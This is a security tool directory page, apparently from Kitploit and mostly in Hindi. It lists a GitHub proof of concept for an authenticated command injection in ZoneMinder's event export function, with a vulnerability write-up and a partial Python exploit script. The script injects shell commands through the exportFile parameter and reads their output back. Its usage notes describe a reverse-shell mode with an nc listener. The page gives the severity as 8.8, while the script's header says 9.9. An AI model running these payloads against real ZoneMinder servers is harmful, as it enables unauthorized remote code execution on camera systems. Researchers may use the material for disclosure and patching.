Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/d4kw1n/cve-2026-102607-zoneminder
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरिमोट एक्सेस ट्रोजन
GitHub
d4kw1n/cve-2026-102607-zoneminder

CVE-2026-102607-ZoneMinder

Python PoC जो CVE-2026-102607 का उपयोग करता है, जो ZoneMinder <= 1.38.1 के exportEvents() में एक authenticated OS command injection है, जो RCE, command output exfiltration और reverse shells को सक्षम बनाता है।

रिपॉजिटरी देखें
16 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

सुरक्षा भेद्यता रिपोर्ट: ZoneMinder exportEvents() में OS कमांड इंजेक्शन

सारांश

ZoneMinder की इवेंट एक्सपोर्ट कार्यक्षमता में एक प्रमाणित OS कमांड इंजेक्शन भेद्यता मौजूद है। exportFile HTTP अनुरोध पैरामीटर को PHP के exec() के माध्यम से निष्पादित शेल कमांड में बिना सैनिटाइज़ किए पास किया जाता है, जिससे View Events अनुमति वाला कोई भी प्रमाणित उपयोगकर्ता सर्वर पर मनमाने ऑपरेटिंग सिस्टम कमांड निष्पादित कर सकता है।

यह भेद्यता वेब सर्वर उपयोगकर्ता (www-data) के रूप में पूर्ण Remote Code Execution (RCE) का परिणाम देती है।

गंभीरता

  • CVSS v3.1 स्कोर: 8.8. (उच्च)
  • CVSS वेक्टर: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
  • CWE: CWE-78 (OS कमांड में प्रयुक्त विशेष तत्वों का अनुचित निष्क्रियकरण)

प्रभावित संस्करण

  • ZoneMinder ≤ 1.38.1 (लेखन के समय नवीनतम रिलीज़)
  • ZoneMinder 1.38.1 पर पुष्टि की गई

भेद्यता विवरण

स्थान

  • प्रवेश बिंदु: web/ajax/event.php, पंक्ति 103
  • भेद्य फ़ंक्शन: web/skins/classic/includes/export_functions.php में exportEvents(), पंक्तियाँ 1030–1032

मूल कारण

exportEvents() फ़ंक्शन एक $export_root पैरामीटर स्वीकार करता है जो सीधे $_REQUEST['exportFile'] से प्राप्त होता है (ajax/event.php, पंक्ति 103 के माध्यम से)। इस पैरामीटर का उपयोग tar और zip कमांड में जोड़े जाने वाले डायरेक्टरी पथ के निर्माण के लिए किया जाता है।

जबकि पंक्ति 1020 पर आर्काइव फ़ाइल पथ ($archive_path) escapeshellarg() का उपयोग करके उचित रूप से एस्केप किया गया है, पंक्ति 1030 पर ट्रेलिंग डायरेक्टरी आर्गुमेंट को बिना किसी सैनिटाइज़ेशन के सीधे कमांड स्ट्रिंग में जोड़ा गया है:

// Line 1020 — properly escaped ✓
$command .= ' --file='.escapeshellarg($archive_path);

// Line 1030 — NOT escaped ✗ (VULNERABLE)
$command .= ' '.$export_root.($connkey?'_'.$connkey:'').'/';

// Line 1032 — executed
exec($command, $output, $status);

एक हमलावर इच्छित tar/zip कमांड से बाहर निकलने और मनमाने कमांड निष्पादित करने के लिए exportFile पैरामीटर में शेल मेटाकैरेक्टर (;, |, &&, आदि) इंजेक्ट कर सकता है। PHP द्वारा जोड़े गए ट्रेलिंग / को # (शेल कमेंट कैरेक्टर) का उपयोग करके बेअसर किया जा सकता है।

डेटा प्रवाह

HTTP Request: $_REQUEST['exportFile']
        │
        ▼
ajax/event.php (line 103)
    └── exportEvents(..., $_REQUEST['exportFile'])
                │
                ▼
export_functions.php (line 890)
    └── $export_root = $_REQUEST['exportFile']   // No sanitization
                │
                ▼
export_functions.php (line 1030)
    └── $command .= ' ' . $export_root . '/'     // Direct concatenation
                │
                ▼
export_functions.php (line 1032)
    └── exec($command)                           // OS Command Execution

पूर्वापेक्षाएँ

  • प्रमाणीकरण: View Events या View Snapshots अनुमति वाला कोई भी प्रमाणित उपयोगकर्ता।
  • CSRF टोकन: एक वैध __csrf_magic टोकन शामिल होना चाहिए (किसी भी ZoneMinder पृष्ठ से प्राप्त)।
  • exportDetail=1: गैर-मौजूद इवेंट ID का उपयोग करते समय exportEventImagesMaster() में PHP घातक त्रुटि को रोकने के लिए यह पैरामीटर अनुरोध में शामिल होना चाहिए।

प्रूफ ऑफ कॉन्सेप्ट

कोड PoC

#!/usr/bin/env python3
"""
=====================================================================

Affected Version : ZoneMinder <= 1.38.1
Tested On        : ZoneMinder 1.38.1 (Docker)
Vulnerability    : OS Command Injection in exportEvents()
CVSS Score       : 9.9 (Critical)
Attack Vector    : Network (Authenticated)
File             : web/skins/classic/includes/export_functions.php
Sink             : exec() at line 1032

Description:
    The exportEvents() function in ZoneMinder constructs shell commands
    for `tar` and `zip` archival using unsanitized user input from the
    `exportFile` HTTP request parameter. This parameter is used as the
    `$export_root` variable, which is directly concatenated into the
    command string passed to exec() without escapeshellarg() or any
    equivalent sanitization.

    An authenticated attacker with "View Events" permission can inject
    arbitrary OS commands by appending shell metacharacters (;) to the
    `exportFile` parameter, achieving Remote Code Execution as the
    web server user (www-data).

Usage:
    1. Start a listener on your attack machine:
       $ nc -lvnp <LPORT>

    2. Run this exploit:
       $ python3 poc.py --target http://<TARGET>/zm --lhost <LHOST> --lport <LPORT>

    3. The exploit supports three modes:
       --mode check   : Verify the vulnerability (sleep-based timing)
       --mode whoami  : Extract the output of `whoami`
       --mode revshell: Spawn a reverse shell to LHOST:LPORT

Author : d4kw1n
Date   : 2026-03-10
"""

import argparse
import re
import sys
import time
import urllib.parse

try:
    import requests
except ImportError:
    print("[-] 'requests' library required. Install with: pip install requests")
    sys.exit(1)


BANNER = r"""
  ZoneMinder - Authenticated RCE via exportEvents() Command Injection - d4kw1n
"""


class ZMExploit:
    def __init__(self, target, lhost=None, lport=None, session_cookie=None):
        self.target = target.rstrip("/")
        self.lhost = lhost
        self.lport = lport
        self.session = requests.Session()
        self.session.verify = False

        if session_cookie:
            self.session.cookies.set("ZMSESSID", session_cookie)

    def get_csrf_token(self):
        """Fetch a valid CSRF token from the target."""
        res = self.session.get(f"{self.target}/index.php", timeout=10)
        match = re.search(r'var csrfMagicToken = "(.*?)";', res.text)
        if not match:
            print("[-] Failed to extract CSRF token. Is the target reachable?")
            return None
        return match.group(1)

    def send_payload(self, payload):
        """Send the injection payload via the export action."""
        csrf = self.get_csrf_token()
        if not csrf:
            return None

        data = {
            "view": "request",
            "request": "event",
            "action": "export",
            "exportFormat": "tar",
            "exportDetail": "1",
            "eids[]": "1",
            "exportFile": payload,
            "__csrf_magic": csrf,
        }
        try:
            return self.session.post(
                f"{self.target}/index.php", data=data, timeout=30
            )
        except requests.exceptions.ReadTimeout:
            return None

    def read_output(self, filename):
        """Read exfiltrated command output via archive.php."""
        res = self.session.get(
            f"{self.target}/index.php?view=archive&type=tar&file={filename}",
            timeout=10,
        )
        return res.text.strip()

    # ── Mode: check ──────────────────────────────────────────────
    def check(self):
        """Verify the vulnerability using a timing-based approach."""
        delay = 5
        print(f"[*] Sending sleep {delay} payload for timing verification...")

        payload = f"a; sleep {delay}; #"
        start = time.time()
        self.send_payload(payload)
        elapsed = time.time() - start

        print(f"[*] Response time: {elapsed:.2f}s (expected >= {delay}s)")
        if elapsed >= delay:
            print("[+] VULNERABLE - Command injection confirmed!")
            return True
        else:
            print("[-] NOT VULNERABLE or target unreachable.")
            return False

    # ── Mode: whoami ─────────────────────────────────────────────
    def whoami(self):
        """Extract the web server user via command output exfiltration."""
        outfile = "whoami.tar"
        print(f"[*] Injecting: whoami > {outfile}")

        self.send_payload(f"a; whoami > {outfile}; #")
        result = self.read_output(outfile)

        if result:
            print(f"[+] Server running as: {result}")
        else:
            print("[-] Could not retrieve output.")
        return result
टूल डाउनलोड करें